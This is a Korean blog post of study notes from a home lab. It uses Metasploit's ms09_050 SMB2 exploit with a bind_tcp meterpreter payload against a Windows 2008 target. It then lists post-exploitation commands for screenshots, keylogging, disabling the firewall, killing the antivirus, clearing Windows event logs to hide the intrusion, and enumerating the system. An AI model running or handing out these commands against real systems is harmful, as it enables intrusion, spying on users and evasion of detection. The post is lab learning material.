2024. 1. 3. 23:33ㆍInformation Security 정보보안/System Security 시스템 보안
meterpreter 스샷
meterpreter 키로거
미터프리터
미터프리터 정보수집
알약중지 시키기
방화벽 비활성화 시키기
스크린샷 해킹
Metaploit
BindTCP
시스템 보안
시스템 해킹
msfconsole
제가 지금 부터 작성하는 모든글은 제가 공부기록용이기 때문에 정확하지 않을수 있음을 알려드립니다.
틀린게 있으면 댓글로 써주시면 고치겠습니다.
지난시간
meterpreter 를 계속했고 이번시간에도 그럴것이다
msfconsole
미스포춘 부른뒤에 아래를 실행한다
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set payload windows/meterpreter/bind_tcp
set rhosts 192.168.10.245
exploit
이런식으로 지난번 연결한다
아니면
파일로 리딩 해도된다
vi meta.rc 로 해서 위에 것 넣어주면 한번에 실행가능
msfconsole -r meta.rc
그전에 meterpreter 가 뭔지 제대로 알자면
"Meterpreter"는 Metasploit Framework 내에 있는 고급 페이로드(payload)이다
Metasploit은 보안 전문가들이 네트워크의 보안 취약점을 발견하고
테스트하기 위해 사용하는 오픈 소스 도구인데
Meterpreter는 메모리 내에서 직접 실행되며,
공격자가 원격 시스템에서 코드를 실행하고,
시스템 정보를 수집하고,
네트워크 연결을 조작하는 등의 다양한 기능을 제공한다
그러나 악의적으로 이용될경우 법의 방망이 한대 맞을수있다
자 아까 와같이 실행하면
이런창에 오게 된다 이떄부터 우린 여러가지를 할수있다
01. 스크린 샷
현재 window2008 (공격할대상) 의 화면이다
이제 kali에서 아까 meterpreter 에서 screenshot 을 입력해본다
그럼뭔가 jpeg 로 사진이 저장되는데 그 사진을 열어보면
캡쳐된걸 볼수있다
02. 스크린 공유
이번엔 스크린 공유다 말그대로 스크린이 그대로 공유된다
screenshare 하면 인터넷익스플로어 열리면서 거기서 공유가 된다
03. 파일 업/다운로드
upload file.txt
download file.txt
이건 말그대로 upload 하고 download를 해서 파일을
주고 받을수있다
이건 간단하니 그냥 넘어가자
04. 키로거
run post/windows/capture/keylog_recoder
를 실행해보자
저 경로로 저장된다 시작한뒤에 window에서 아무렇게나 해보고 kali 돌아와서
ctrl+C 하면 종료되고 저장된다
05. 방화벽 활성화 /비활성화
shell
한뒤에
netsh firewall set opmode mode=enable
(방화벽활성화)
netsh firewall set opmode mode=disable
(방화벽 비활성화)
이렇게 둘중 골라서 할수있다
설정하면 window2008에서 설정한것에 맞게 설정될것이다
06. 알약 중지
meterpreter > run killav
혹시나 방화벽꺼도 안되면 알약도 중지시켜보자
07. 로그 삭제
shell
wevtutil.exe cl "System"
wevtutil.exe cl "Application"
wevtutil.exe cl "Security"
wevtutil.exe cl "Setup"
이렇게 하는데 이런게 어딧냐면
컴퓨터 관리 > 시스템도구 > windows log > 에 보면 볼수있다
여기에서 보면 응용프로그램의 log 기록이 있는걸 볼수있다
이젠 kali에서
실행시키고 다시 window로 가보면
깔끔하게 지워진걸 볼수있다
이걸로 해킹했던 기록을 지울수있다
08 스크린 샷 (5초단위 6장)
meterpreter > run post/windows/gather/screen_spy
아까와 동일한 스샷이지만 그냥 여려장 찍는것이다
09 정보수집
아까 로그를 지웠으면 이번엔
meterpreter > run post/windows/gather/enum_applicationㄴ <-응용프로그램
meterpreter > run post/windows/gather/enum_devices <- 장치정보
meterpreter > run post/windows/gather/enum_services <-서비스
msterpreter > run post/windows/gather/usb_history <-usb 사용흔적
이렇게해서 저장해주고
시스템에 설치된 응용 프로그램들의 목록을 수집
시스템에 연결된 장치들의 정보를 수집
시스템에서 실행 중이거나 설치된 서비스들의 목록을 수집
USB 장치들의 사용 기록을 수집
등의
정보를 수집한다
저장된 경로가 있으니 가서 열어보면 된다
이러면 BIND_TCP의 끝이 났다
이제 다음시간에는 reverse_TCP를 제대로 해보겠다
reverseTCP는 윈도우2008 도 윈도우10도 window2016 도
작동한다
그만큼 강력하다고 볼수있다 :) 그럼 다음시간에 보기로~ 그럼 20000~